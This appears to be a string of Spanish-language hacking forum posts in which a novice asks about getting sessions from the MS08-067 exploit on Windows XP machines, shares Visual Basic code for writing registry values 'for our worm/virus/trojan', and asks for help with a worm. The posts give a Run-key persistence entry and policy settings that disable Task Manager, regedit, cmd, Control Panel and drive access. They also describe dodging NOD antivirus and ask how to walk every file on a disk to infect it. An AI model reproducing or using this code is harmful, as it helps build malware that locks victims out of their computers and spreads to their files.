Temas

Hola,antes que nada feliz navidad!!
Bueno,la cuestion es esta:
No tengo mucha experiencia en esto,recien empiezo.
He podido entrar a algunos sistemas usando el exploit smb ms08_067_netapi,con bind_tcp.
Hasta ahi bien,PERO hay sistemas en los que me detecta bien el fingerprint,la mayoria XP SP2-3 y se queda en el paso "Triggering vulnerability...",de ahi se salta a "Exploit completed,but no session was created."
Cual es la razon de esto? Firewall??

Otra duda,en algunos no detecta bien el Service Pack,o el idioma del s.o y no deja continuar,asi es siempre o hay alguna forma de bypassear esto??

De antemano muchas gracias!

[Ahora lo bueno:]

Hola!

Querìa compartir algunas entradas del registro que hacen cosas curiosas y haran feliz a nuestro worm/virus/troyano  

Antes que nada,el codigo para modificar una entrada en el registro (hay otras formas,pero esta me gusta):

Código [Seleccionar] Expandir



'MODULO

'Constantes de tipos de datos
 Private m_lngRetVal As Long
 Private Const REG_SZ As Long = 1
 Private Const REG_BINARY As Long = 3
 Private Const REG_DWORD As Long = 4
 
'Constantes para las llaves
 Public Const HKEY_CLASSES_ROOT As Long = &H80000000
 Public Const HKEY_CURRENT_USER As Long = &H80000001
 Public Const HKEY_LOCAL_MACHINE As Long = &H80000002
 Public Const HKEY_USERS As Long = &H80000003
 
 'API
  Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal lngRootKey As Long) As Long
 
  Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" _
           (ByVal lngRootKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
 
  Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
           (ByVal lngRootKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
            ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long


'Esta es nuestra funciòn para crear/editar una entrada:

Public Sub RegC(ByVal lngRootKey As Long, ByVal strRegKeyPath As String, _
                              ByVal strRegSubKey As String, varRegData As Variant)
 Dim lngKeyHandle As Long
 Dim lngDataType As Long
 Dim lngKeyValue As Long
 Dim strKeyValue As String
 If IsNumeric(varRegData) Then
     lngDataType = REG_DWORD
 Else
     lngDataType = REG_SZ
 End If
 m_lngRetVal = RegCreateKey(lngRootKey, strRegKeyPath, lngKeyHandle)
 Select Case lngDataType
        Case REG_SZ:
             strKeyValue = Trim(varRegData) & Chr(0)     '
             m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
                                         ByVal strKeyValue, Len(strKeyValue))
                                 
        Case REG_DWORD:
             lngKeyValue = CLng(varRegData)
             m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
                                        lngKeyValue, 4&)
 End Select
 m_lngRetVal = RegCloseKey(lngKeyHandle)
End Sub



Un ejemplo para usar la funciòn :

Código [Seleccionar] Expandir

RegC HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","Hola","c:\Hola.exe"


Se creara/modificara la entrada Hola,con los datos "c:\hola.exe",en la ruta HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Ahora lo bueno:

Para ocultar el acceso al Panel de Control.

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","NoDispCPL","1"


Para desaparecer el botòn de Apagar:

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoClose","1"


Para dejar en blanco el escritorio(No iconos):

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDesktop","1"


Para restringir drives de Mi PC

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDrives","3"


Para esa funciòn,pueden cambiar el "3" por los sig. valores para resultados diferentes: "3" restringe acceso a las unidades A y B,"4" restringe C: (buenisimo),"7" restringe A,B y C,"F" de A hasta D.

Para desactivar el botòn Buscar:

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFind","1"


Para desactivar Opciones de Carpeta:

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFoldeOptions","1"


Para desactivar el boton Ejecutar:

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoRun","1"


Para desactivar que se guarden los cambios al cerrar sesion :

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoSaveSettings","1"


Para desactivar la modificaciòn del registro (regedit y regedt32) :

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableRegistryTools","1"


Para desactivar el admin. de tareas (taskmgr) :

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableTaskManager","1"


Para desactivar la consola (cmd) :

Código [Seleccionar] Expandir

RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableCMD","1"


Espero que les agrade  

Hola!

Estoy haciendo un pequeño worm,la cosa es que todas las llamadas a funciones las tenìa en form_load y el NOD me hacia *****.

Cambie todo a form_initialize,y ya no detecta nada,pero aun no lo pruebo.

Cual es la diferencia? Busque en Google pero solo encontre cual es el orden de los eventos al ejecutarse la aplicaciòn.

Funciona igual con form_initialize? Gracias!

EDIT: Ya lo probè en VMware y funciona igualito,pero quedo indetectable  sigo sin saber cual es la diferencia..

Que pex.

Sòlo necesito saber como puedo hacer que todos los archivos del DD pasen por una variable (sName) uno por uno,para infectarlos o no,pero de eso me encargo yo.

Intente con algunos For y los controles DirListBox y FileListBox,pero no me resulta.

Alguna forma de hacer una busqueda completa de todos los archivos del DD,que no sea con  WSCRIPT?

Gracias!